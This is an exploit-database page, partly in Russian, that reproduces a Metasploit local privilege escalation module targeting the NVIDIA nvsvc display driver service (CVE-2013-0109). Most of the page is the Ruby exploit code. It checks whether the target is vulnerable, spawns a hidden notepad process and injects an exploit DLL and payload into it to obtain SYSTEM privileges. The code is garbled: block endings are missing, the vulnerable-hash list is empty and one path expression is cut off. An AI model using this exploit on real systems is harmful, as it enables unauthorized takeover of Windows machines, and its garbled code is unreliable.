Nvidia (nvsvc) Display Driver Service Local Privilege Escalation Exploit


Дата публикации:
Тип воздействия:
Повышение привилегий
Описание уязвимости:
Повышение привилегий в NVIDIA Graphics Drivers для Windows


# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/windows/priv'
require 'msf/core/post/windows/process'
require 'msf/core/post/windows/reflective_dll_injection'
require 'msf/core/post/windows/services'
class Metasploit3 < Msf::Exploit::Local
  Rank = AverageRanking
  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::ReflectiveDLLInjection
  include Msf::Post::Windows::Services
  def initialize(info={})
    super(update_info(info, {
      'Name'            => 'Nvidia (nvsvc) Display Driver Service Local Privilege Escalation',
      'Description'     => %q{
        The named pipe, \pipe\nsvr, has a NULL DACL allowing any authenticated user to
        interact with the service. It contains a stacked based buffer overflow as a result
        of a memmove operation. Note the slight spelling differences: the executable is 'nvvsvc.exe',
        the service name is 'nvsvc', and the named pipe is 'nsvr'.
        This exploit automatically targets nvvsvc.exe versions dated Nov 3 2011, Aug 30 2012, and Dec 1 2012.
        It has been tested on Windows 7 64-bit against nvvsvc.exe dated Dec 1 2012.
      'License'         => MSF_LICENSE,
      'Author'          =>
          'Peter Wintersmith', # Original exploit
          'Ben Campbell <eat_meatballs[at]hotmail.co.uk>',   # Metasploit integration
      'Arch'            => ARCH_X86_64,
      'Platform'        => 'win',
      'SessionTypes'    => [ 'meterpreter' ],
      'DefaultOptions'  =>
          'EXITFUNC'    => 'thread',
      'Targets'         =>
          [ 'Windows x64', { } ]
      'Payload'         =>
          'Space'       => 2048,
          'DisableNops' => true,
          'BadChars'    => "\x00"
      'References'      =>
          [ 'CVE', '2013-0109' ],
          [ 'OSVDB', '88745' ],
          [ 'URL', 'http://nvidia.custhelp.com/app/answers/detail/a_id/3288' ],
      'DisclosureDate' => 'Dec 25 2012',
      'DefaultTarget'  => 0
  def check
    vuln_hashes = [
    os = sysinfo["OS"]
    if os =~ /windows/i
      svc = service_info 'nvsvc'
      if svc and svc['Name'] =~ /NVIDIA/i
        vprint_good("Found service '#{svc['Name']}'")
          if is_running?
            print_good("Service is running")
            print_error("Service is not running!")
        rescue RuntimeError => e
          print_error("Unable to retrieve service status")
        if sysinfo['Architecture'] =~ /WOW64/i
          path = svc['Command'].gsub('"','').strip
          path = svc['Command'].gsub('"','').strip
          hash = client.fs.file.md5(path).unpack('H*').first
        rescue Rex::Post::Meterpreter::RequestError => e
          print_error("Error checking file hash: #{e}")
          return Exploit::CheckCode::Detected
        if vuln_hashes.include?(hash)
          vprint_good("Hash '#{hash}' is listed as vulnerable")
          return Exploit::CheckCode::Vulnerable
          vprint_status("Hash '#{hash}' is not recorded as vulnerable")
          return Exploit::CheckCode::Detected
        return Exploit::CheckCode::Safe
  def is_running?
      status = service_status('nvsvc')
      return (status and status[:state] == 4)
    rescue RuntimeError => e
      print_error("Unable to retrieve service status")
      return false
  def exploit
    if is_system?
      fail_with(Exploit::Failure::None, 'Session is already elevated')
    unless check == Exploit::CheckCode::Vulnerable
      fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
    print_status("Launching notepad to host the exploit...")
    windir = expand_path("%windir%")
    cmd = "#{windir}\\SysWOW64\\notepad.exe"
    process = client.sys.process.execute(cmd, nil, {'Hidden' => true})
    host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)
    print_good("Process #{process.pid} launched.")
    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
    library_path = ::File.join(Msf::Config.data_directory,
    library_path = ::File.expand_path(library_path)
    print_status("Injecting exploit into #{process.pid} ...")
    exploit_mem, offset = inject_dll_into_process(host_process, library_path)
    print_status("Exploit injected. Injecting payload into #{process.pid}...")
    payload_mem = inject_into_process(host_process, payload.encoded)
    # invoke the exploit, passing in the address of the payload that
    # we want invoked on successful exploitation.
    print_status("Payload injected. Executing exploit...")
    host_process.thread.create(exploit_mem + offset, payload_mem)
    print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.")
или введите имя